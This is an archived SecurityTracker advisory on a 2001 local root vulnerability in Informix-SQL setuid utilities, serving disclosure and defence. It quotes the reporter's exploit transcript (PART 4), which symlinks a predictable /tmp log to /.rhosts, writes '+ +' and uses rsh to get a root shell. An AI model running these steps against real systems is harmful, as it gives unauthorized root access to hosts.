SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Informix Vendors:   IBM
Informix-SQL Database Application Lets Local Users Write to Files on the System with Root Level Privileges
SecurityTracker Alert ID:  1002347
SecurityTracker URL:  http://securitytracker.com/id/1002347
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Sep 14 2001
Original Entry Date:  Sep 8 2001
Impact:   Modification of system information, Root access via local system

Version(s): 7.31.UC5, possibly others
Description:   Hackerslab reported a vulnerability in Informix-SQL that allows a local user to create or overwrite files on the host with root level privileges, potentially giving the user root level access on the host.

The application includes some set user id (suid) root applications that allow a local user to create any file with root privilege. These suid files include onbar_d, ondblog, onsmsync, and onsrvapd, all in the informix/bin Informix HOME directory. They create temporary files with predictable file names, allowing a local user to create a symlink from the predictable file name to another file on the system. When the utilities are executed, they will write to the symlinked file with root level privileges.

A demonstration exploit transcript is provided in the Source Message.

Impact:   A local user can create any file with root level privileges, giving the local user root level access on the host.
Solution:   No vendor solution was available at the time of this entry.

The author of the report provides a workaround, involving removing suid permission from certain Informix files:

$ su -
# cd ~informix/bin (Informix HOME Directory)
# chmod o-s onbar_d ondblog onsmsync onsrvapd

Vendor URL:  www.informix.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [ Hackerslab bug_paper ] Informix-SQL application vulnerability


==============================================================================

       [ Hackerslab bug_paper ] Informix-SQL application vulnerability

==============================================================================

File   : Informix-SQL application

SYSTEM : Systems running Informix

INFO :

There is a vulneribility in informix-SQL application which allows local
users to create any file with root privilege:

PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5   
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x   1 root     informix 2234104 Nov 18  1999 onbar_d
-rwsr-sr-x   1 root     informix 2219456 Nov 18  1999 ondblog
-rwsr-sr-x   1 root     informix 2284972 Apr 10  2000 onsmsync
-rwsr-sr-x   1 root     informix   39144 Nov 18  1999 onsrvapd

$ ./onbar_d   or ./ondblog  or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw----   1 root     informix     557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw----   1 root     informix       0 Aug 29 17:26 /tmp/bar_dbug.log


PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw-   1 root     informix     141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw-   1 informix informix     319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx   1 root     root        1085 Aug 29 17:43 /tmp/snmpd.log


PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw-   1 root     informix     141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root


SOLUTION :

remove setuid permition, contact your vendor and get a patch.
$ su -
# cd ~informix/bin  (Informix HOME Directory)
# chmod o-s onbar_d  ondblog  onsmsync  onsrvapd


==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *                                               Kim Yong-Jun
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC